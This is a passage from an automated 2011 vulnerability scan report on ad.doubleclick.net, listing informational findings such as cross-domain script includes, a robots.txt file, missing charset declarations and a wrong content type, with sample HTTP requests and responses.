Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5877.1509.0558551710521/B5104260.30

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

7.5. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p81479006&PRAd=58779357&AR_C=40313979
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

8. Robots.txt file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 14:31:04 GMT
Date: Fri, 11 Feb 2011 18:16:33 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

9. HTML does not specify charset previous next
There are 7 instances of this issue:

/adi/N4359.msn.comOX2567/B5091231.144
/adi/N4359.msn.comOX2567/B5091231.146
/adi/N5047.132797.8628078479321/B4150925.22
/adi/N5877.1509.0558551710521/B5104260.30
/adi/pcw.main.news/topics/consumer_advice/article
/adi/pcw.main.search/index
/clk

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

9.1. http://ad.doubleclick.net/adi/N4359.msn.comOX2567/B5091231.144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4359.msn.comOX2567/B5091231.144

Request

GET /adi/N4359.msn.comOX2567/B5091231.144;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/11000000000033118.1?!&&PID=8154750&UIT=G&TargetID=28683750&AN=1662206136&PG=LIFYGB&ASID=f58c59c1bef74d229169f04a72a59f63&destination=;ord=1662206136? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://lifestyle.msn.com/your-life/your-money-today/staticslideshow.aspx?cp-documentid=27521348&gt1=32078
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

9.2. http://ad.doubleclick.net/adi/N4359.msn.comOX2567/B5091231.146 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4359.msn.comOX2567/B5091231.146

Request

Response

9.3. http://ad.doubleclick.net/adi/N5047.132797.8628078479321/B4150925.22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5047.132797.8628078479321/B4150925.22

Request

Response

9.4. http://ad.doubleclick.net/adi/N5877.1509.0558551710521/B5104260.30 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5877.1509.0558551710521/B5104260.30

Request

Response

9.5. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.news/topics/consumer_advice/article

Request

Response

9.6. http://ad.doubleclick.net/adi/pcw.main.search/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/pcw.main.search/index

Request

Response

9.7. http://ad.doubleclick.net/clk previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Fri, 11 Feb 2011 20:57:34 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

10. Content type incorrectly stated previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Request

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Fri, 11 Feb 2011 20:57:34 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

Report generated by CloudScan Vulnerability Crawler at Sun Feb 13 08:47:34 CST 2011.